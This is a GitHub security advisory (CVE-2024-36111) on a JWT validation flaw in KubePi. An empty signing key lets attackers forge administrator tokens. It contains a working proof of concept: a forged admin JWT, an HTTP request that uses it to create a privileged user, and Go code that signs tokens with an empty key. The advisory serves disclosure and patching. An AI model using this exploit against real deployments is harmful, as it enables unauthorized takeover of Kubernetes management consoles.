Skip to content

JWT token validation has a defect

Moderate
wanghe-fit2cloud published GHSA-8q5r-cvcw-4wx7 Jul 25, 2024

Package

No package listed

Affected versions

>=v1.6.3 <=v1.7.0

Patched versions

v1.8.0

Description

Summary

kubepi jwttoken 校验存在缺陷,默认配置文件中jwt密钥为空,虽然读取配置文件相关逻辑中检测到密钥为空时,会生成一个随机32位字符串覆盖配置文件中的密钥,但是实际校验时,密钥为空,使用空密钥生成jwttoken可绕过登录校验,可直接接管后台

Details

1.搭建最新版kubepi
sudo docker run --privileged -d --restart=unless-stopped -p 9982:80 1panel/kubepi

2.使用空密钥生成jwttoken eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4

image

3.使用生成的密钥创建用户tang

POST /kubepi/api/v1/users HTTP/1.1
Host: 127.0.0.1:9982
Content-Length: 248
sec-ch-ua: 
Accept: application/json, text/plain, */*
lang: zh-CN
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://127.0.0.1:9982
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9982/kubepi/user-management/users/create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
Connection: close

{"apiVersion":"v1","kind":"User","name":"tang","roles":["Common User","Manage Image Registries","Manage Clusters","Manage RBAC"],"nickName":"tang","email":"[email protected]","authenticate":{"password":"12345678@Tang"},"mfa":{"enable":false,"secret":""}}
image

4.使用创建的用户tang正常登录后台

image

PoC

package main

import (
	"fmt"
	"github.com/kataras/iris/v12/middleware/jwt"
	"time"
)

var jwtMaxAge = 100000 * time.Minute

type UserProfile struct {
	Name                string              `json:"name"`
	NickName            string              `json:"nickName"`
	Email               string              `json:"email"`
	Language            string              `json:"language"`
	ResourcePermissions map[string][]string `json:"resourcePermissions"`
	IsAdministrator     bool                `json:"isAdministrator"`
	Mfa                 Mfa                 `json:"mfa"`
}

type Mfa struct {
	Enable   bool   `json:"enable"`
	Secret   string `json:"secret"`
	Approved bool   `json:"approved"`
}

func main() {
	jwtSigner := jwt.NewSigner(jwt.HS256, "", jwtMaxAge)
	test := map[string][]string{}
	profile := UserProfile{
		Name:                "admin",
		NickName:            "Administrator",
		Email:               "[email protected]",
		Language:            "zh-CN",
		ResourcePermissions: test,
		IsAdministrator:     true,
		Mfa: Mfa{
			Secret:   "",
			Enable:   false,
			Approved: false,
		},
	}
	nonejwt, _ := jwtSigner.Sign(profile)
	fmt.Println(string(nonejwt))
}

补充说明

其实主要问题就是虽然有检测到配置文件中key为空时会生成一个32位的随机字符串覆盖配置文件中的key,但是实际上jwt.NewVerifier时并未使用这个生成的key,而是使用最开始默认配置文件中读取到的空字符串key作为jwtkey了。存在逻辑缺陷。服务重启后虽然会按照写入了随机的32为key的配置文件启动,但是未重启过服务的都是空字符串key。
image

Impact

校验不当

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CVE ID

CVE-2024-36111

Weaknesses

No CWEs

Credits